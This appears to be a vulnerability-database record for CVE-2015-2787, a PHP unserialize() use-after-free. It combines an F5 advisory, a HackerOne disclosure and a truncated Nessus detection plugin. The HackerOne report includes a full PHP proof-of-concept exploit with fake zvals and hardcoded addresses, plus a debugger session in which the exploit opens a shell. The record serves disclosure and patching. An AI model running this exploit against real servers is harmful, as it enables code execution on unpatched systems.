ID CVE-2015-2787 Type cve Reporter NVD Modified 2018-01-04T21:30:04
Description
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x before 5.6.7 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages use of the unset function within an __wakeup function, a related issue to CVE-2015-0231.
{"f5": [{"lastseen": "2016-11-09T00:09:29", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/0000/100/sol167.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "**Note**: As of February 17, 2015, AskF5 Security Advisory articles include the Severity value. Security Advisory articles published before this date do not list a Severity value.\n\nRecommended Action\n\nNone\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "reporter": "f5", "published": "2015-04-22T00:00:00", "title": "SOL16486 - PHP vulnerability CVE-2015-2787", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2015-2787", "CVE-2015-0231"], "modified": "2015-04-22T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/400/sol16486.html", "id": "SOL16486", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "hackerone": [{"lastseen": "2018-08-31T00:39:15", "references": [], "bounty": 1500.0, "h1team": {"profile_picture_urls": {"small": "https://profile-photos.hackerone-user-content.com/000/000/029/0a20311cece1ff1938eac3f9b09a6af056bc9e90_small.png?1385119730", "medium": "https://profile-photos.hackerone-user-content.com/000/000/029/991fb39ba898696eb6ae62521c49b292b2a9cf95_medium.png?1385119730"}, "handle": "ibb-php", "url": "https://hackerone.com/ibb-php"}, "bountyState": "resolved", "description": "#Use After Free Vulnerability in unserialize()\n\nTaoguang Chen <[ () chtg](http://github.com/chtg)>\n- Write Date: 2015.2.3\n- Release Date: 2015.3.20\n\nA use-after-free vulnerability was discovered in unserialize() with a specially defined object's __wakeup() magic \nmethod that can be abused for leaking arbitrary memory blocks or execute arbitrary code.\n\nAffected Versions\n------------\nAffected is PHP 5.6 < 5.6.7\nAffected is PHP 5.5 < 5.5.23\nAffected is PHP 5.4 < 5.4.39\nAffected is PHP 5 <= 5.3.29\nAffected is PHP 4 <= 4.4.9\n\nCredits\n------------\nThis vulnerability was disclosed by Taoguang Chen.\n\nDescription\n------------\n\n```\nstatic inline int object_common2(UNSERIALIZE_PARAMETER, zend_long elements)\n{\n zval retval;\n zval fname;\n\n if (Z_TYPE_P(rval) != IS_OBJECT) {\n return 0;\n }\n\n //??? TODO: resize before\n if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_P(rval),\nelements, 1)) {\n return 0;\n }\n\n ZVAL_DEREF(rval);\n if (Z_OBJCE_P(rval) != PHP_IC_ENTRY &&\n zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, \"__wakeup\",\nsizeof(\"__wakeup\")-1)) {\n ZVAL_STRINGL(&fname, \"__wakeup\", sizeof(\"__wakeup\") - 1);\n BG(serialize_lock)++;\n call_user_function_ex(CG(function_table), rval, &fname, &retval, 0,\n0, 1, NULL);\n```\n\nA specially defined __wakeup() magic method lead to various problems.\n\nThe simple code:\n\n```\n<?php\n\nclass evilClass {\n\n public $var;\n\n function __wakeup() {\n unset($this->var);\n// $this->var = 'ryat';\n }\n}\n\n$data = unserialize('a:2:{i:0;O:9:\"evilClass\":1:{s:3:\"var\";a:1:{i:0;i:1;}}i:1;R:4;}');\n\n?>\n```\n\nObject properties assignment or destroy operation leads to the ZVAL\nand all its children is freed from memory. However the unserialize()\ncode will still allow to use R: or r: to set references to that\nalready freed memory. There is a use after free vulnerability, and\nallows to execute arbitrary code.\n\nProof of Concept Exploit\n------------\nThe PoC works on standard MacOSX 10.10.2 installation of PHP 5.5.14.\n\n```\n<?php\n\n$f = $argv[1];\n$c = $argv[2];\n\n$fakezval1 = ptr2str(0x100b83008);\n$fakezval1 .= ptr2str(0x8);\n$fakezval1 .= \"\\x00\\x00\\x00\\x00\";\n$fakezval1 .= \"\\x06\";\n$fakezval1 .= \"\\x00\";\n$fakezval1 .= \"\\x00\\x00\";\n\n$data1 = \n'a:3:{i:0;O:9:\"evilClass\":1:{s:3:\"var\";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval1).':\"'.$fakezval1.'\";i:2;a:1:{i:0;R:4;}}';\n\n$x = unserialize($data1);\n$y = $x[2];\n\n// zend_eval_string()'s address\n$y[0][0] = \"\\x6d\";\n$y[0][1] = \"\\x1e\";\n$y[0][2] = \"\\x35\";\n$y[0][3] = \"\\x00\";\n$y[0][4] = \"\\x01\";\n$y[0][5] = \"\\x00\";\n$y[0][6] = \"\\x00\";\n$y[0][7] = \"\\x00\";\n\n$fakezval2 = ptr2str(0x3b296324286624); // $f($c);\n$fakezval2 .= ptr2str(0x100b83000);\n$fakezval2 .= \"\\xff\\xff\\xff\\xff\";\n$fakezval2 .= \"\\x05\";\n$fakezval2 .= \"\\x00\";\n$fakezval2 .= \"\\x00\\x00\";\n\n$data2 = \n'a:3:{i:0;O:9:\"evilClass\":1:{s:3:\"var\";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval2).':\"'.$fakezval2.'\";i:2;a:1:{i:0;R:4;}}}';\n\n$z = unserialize($data2);\nintval($z[2]);\n\nfunction ptr2str($ptr)\n{\n $out = \"\";\n for ($i=0; $i<8; $i++) {\n $out .= chr($ptr & 0xff);\n $ptr >>= 8;\n }\n return $out;\n}\n\nclass evilClass {\n \n public $var;\n \n function __wakeup() {\n unset($this->var);\n// $this->var = 'ryat';\n }\n}\n\n?>\n```\n\nTest the PoC on the command line, then any PHP code can be executed:\n\n```\n$ lldb php\n(lldb) target create \"php\"\nCurrent executable set to 'php' (x86_64).\n(lldb) run uafpoc.php assert \"system\\('sh'\\)==exit\\(\\)\"\nProcess 13472 launched: '/usr/bin/php' (x86_64)\nsh: no job control in this shell\nsh-3.2$ php -v\nPHP 5.5.14 (cli) (built: Sep 9 2014 19:09:25)\nCopyright (c) 1997-2014 The PHP Group\nZend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies\nsh-3.2$ exit\nexit\nProcess 13472 exited with status = 0 (0x00000000)\n(lldb)\n```", "edition": 7, "reporter": "ryat", "published": "2015-02-03T00:00:00", "title": "PHP (IBB): Use After Free Vulnerability in unserialize()", "type": "hackerone", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "h1reporter": {"profile_picture_urls": {"small": "/assets/avatars/default-71a302d706457f3d3a31eb30fa3e73e6cf0b1d677b8fa218eaeaffd67ae97918.png"}, "hacker_mediation": false, "disabled": false, "is_me?": false, "hackerone_triager": false, "url": "/ryat", "username": "ryat"}, "bulletinFamily": "bugbounty", "cvelist": ["CVE-2015-2787"], "modified": "2015-03-17T00:00:00", "id": "H1:73235", "href": "https://hackerone.com/reports/73235", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-01T23:57:46", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=924970", "https://bugzilla.opensuse.org/show_bug.cgi?id=925109", "https://bugzilla.opensuse.org/show_bug.cgi?id=924972"], "pluginID": "82653", "description": "PHP was updated to fix three security issues.\n\nThe following vulnerabilities were fixed :\n\n - use-after-free vulnerability in the process_nested_data function (CVE-2015-2787 bnc#924972)\n\n - unserialize SoapClient type confusion (bnc#925109)\n\n - move_uploaded_file truncates a pathNAME upon encountering a x00 character (CVE-2015-2348 bnc#924970)", "edition": 4, "reporter": "Tenable", "published": "2015-04-09T00:00:00", "title": "openSUSE Security Update : php5 (openSUSE-2015-295)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2348", "CVE-2015-2787"], "modified": "2015-10-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo", "p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo", "p-cpe:/a:novell:opensuse:php5-json-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql-debuginfo", "p-cpe:/a:novell:opensuse:php5-mssql-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl", "p-cpe:/a:novell:opensuse:php5-dba", "p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc-debuginfo", "p-cpe:/a:novell:opensuse:php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-mcrypt", "p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg", "p-cpe:/a:novell:opensuse:php5-bz2", "p-cpe:/a:novell:opensuse:php5-xmlrpc", "p-cpe:/a:novell:opensuse:php5-json", "p-cpe:/a:novell:opensuse:php5-ctype-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite", "p-cpe:/a:novell:opensuse:php5-suhosin", "p-cpe:/a:novell:opensuse:php5-curl", "p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo", "p-cpe:/a:novell:opensuse:php5-mysql", "p-cpe:/a:novell:opensuse:php5-fileinfo", "p-cpe:/a:novell:opensuse:php5-calendar-debuginfo", "p-cpe:/a:novell:opensuse:php5-openssl-debuginfo", "p-cpe:/a:novell:opensuse:php5-shmop-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell-debuginfo", "p-cpe:/a:novell:opensuse:php5-calendar", "p-cpe:/a:novell:opensuse:php5-ldap-debuginfo", "p-cpe:/a:novell:opensuse:php5-pear", "p-cpe:/a:novell:opensuse:php5-intl", "p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo", "p-cpe:/a:novell:opensuse:php5-xsl-debuginfo", "p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant", "p-cpe:/a:novell:opensuse:php5-ftp", "p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy", "p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo", "p-cpe:/a:novell:opensuse:php5-bz2-debuginfo", "p-cpe:/a:novell:opensuse:php5-gettext-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib-debuginfo", "p-cpe:/a:novell:opensuse:php5-posix-debuginfo", "p-cpe:/a:novell:opensuse:php5-tokenizer", "p-cpe:/a:novell:opensuse:php5-imap", "p-cpe:/a:novell:opensuse:php5-sockets", "p-cpe:/a:novell:opensuse:php5-gd", "p-cpe:/a:novell:opensuse:php5-posix", "p-cpe:/a:novell:opensuse:php5-opcache", "p-cpe:/a:novell:opensuse:php5-intl-debuginfo", "p-cpe:/a:novell:opensuse:php5-dba-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem", "p-cpe:/a:novell:opensuse:php5-fpm", "p-cpe:/a:novell:opensuse:php5-fastcgi", "p-cpe:/a:novell:opensuse:php5-wddx", "p-cpe:/a:novell:opensuse:php5-debugsource", "p-cpe:/a:novell:opensuse:php5-zip-debuginfo", "p-cpe:/a:novell:opensuse:php5-odbc", "p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo", "p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader", "p-cpe:/a:novell:opensuse:php5-gmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv-debuginfo", "p-cpe:/a:novell:opensuse:php5-readline-debuginfo", "p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo", "p-cpe:/a:novell:opensuse:php5-gmp", "p-cpe:/a:novell:opensuse:php5-fpm-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp-debuginfo", "p-cpe:/a:novell:opensuse:php5-tidy-debuginfo", "p-cpe:/a:novell:opensuse:php5-zlib", "p-cpe:/a:novell:opensuse:php5-phar-debuginfo", "p-cpe:/a:novell:opensuse:php5-phar", "p-cpe:/a:novell:opensuse:php5-dom", "p-cpe:/a:novell:opensuse:php5-sockets-debuginfo", "p-cpe:/a:novell:opensuse:php5-soap", "p-cpe:/a:novell:opensuse:php5-dom-debuginfo", "p-cpe:/a:novell:opensuse:php5-snmp", "p-cpe:/a:novell:opensuse:php5-exif-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo", "cpe:/o:novell:opensuse:13.2", "p-cpe:/a:novell:opensuse:php5-firebird-debuginfo", "p-cpe:/a:novell:opensuse:php5-imap-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo", "p-cpe:/a:novell:opensuse:php5-pdo", "p-cpe:/a:novell:opensuse:php5-wddx-debuginfo", "p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo", "p-cpe:/a:novell:opensuse:php5-enchant-debuginfo", "p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo", "p-cpe:/a:novell:opensuse:php5-pspell", "p-cpe:/a:novell:opensuse:php5-ctype", "p-cpe:/a:novell:opensuse:apache2-mod_php5", "p-cpe:/a:novell:opensuse:php5-mssql", "p-cpe:/a:novell:opensuse:php5-pcntl", "p-cpe:/a:novell:opensuse:php5-zip", "p-cpe:/a:novell:opensuse:php5-sysvshm", "p-cpe:/a:novell:opensuse:php5", "p-cpe:/a:novell:opensuse:php5-shmop", "p-cpe:/a:novell:opensuse:php5-devel", "p-cpe:/a:novell:opensuse:php5-pdo-debuginfo", "p-cpe:/a:novell:opensuse:php5-gd-debuginfo", "p-cpe:/a:novell:opensuse:php5-firebird", "p-cpe:/a:novell:opensuse:php5-ftp-debuginfo", "p-cpe:/a:novell:opensuse:php5-opcache-debuginfo", "p-cpe:/a:novell:opensuse:php5-iconv", "p-cpe:/a:novell:opensuse:php5-gettext", "p-cpe:/a:novell:opensuse:php5-xmlwriter", "p-cpe:/a:novell:opensuse:php5-bcmath", "p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo", "p-cpe:/a:novell:opensuse:php5-pgsql", "p-cpe:/a:novell:opensuse:php5-xsl", "p-cpe:/a:novell:opensuse:php5-curl-debuginfo", "cpe:/o:novell:opensuse:13.1", "p-cpe:/a:novell:opensuse:php5-readline", "p-cpe:/a:novell:opensuse:php5-mbstring", "p-cpe:/a:novell:opensuse:php5-exif", "p-cpe:/a:novell:opensuse:php5-ldap"], "id": "OPENSUSE-2015-295.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=82653", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2015-295.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82653);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2015/10/05 13:44:22 $\");\n\n script_cve_id(\"CVE-2015-2348\", \"CVE-2015-2787\");\n\n script_name(english:\"openSUSE Security Update : php5 (openSUSE-2015-295)\");\n script_summary(english:\"Check for the openSUSE-2015-295 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"PHP was updated to fix three security issues.\n\nThe following vulnerabilities were fixed :\n\n - use-after-free vulnerability in the process_nested_data\n function (CVE-2015-2787 bnc#924972)\n\n - unserialize SoapClient type confusion (bnc#925109)\n\n - move_uploaded_file truncates a pathNAME upon\n encountering a x00 character (CVE-2015-2348 bnc#924970)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=924970\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=924972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=925109\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php5 packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-firebird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-imap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mssql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pear\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-phar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-readline-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tidy-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/04/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n 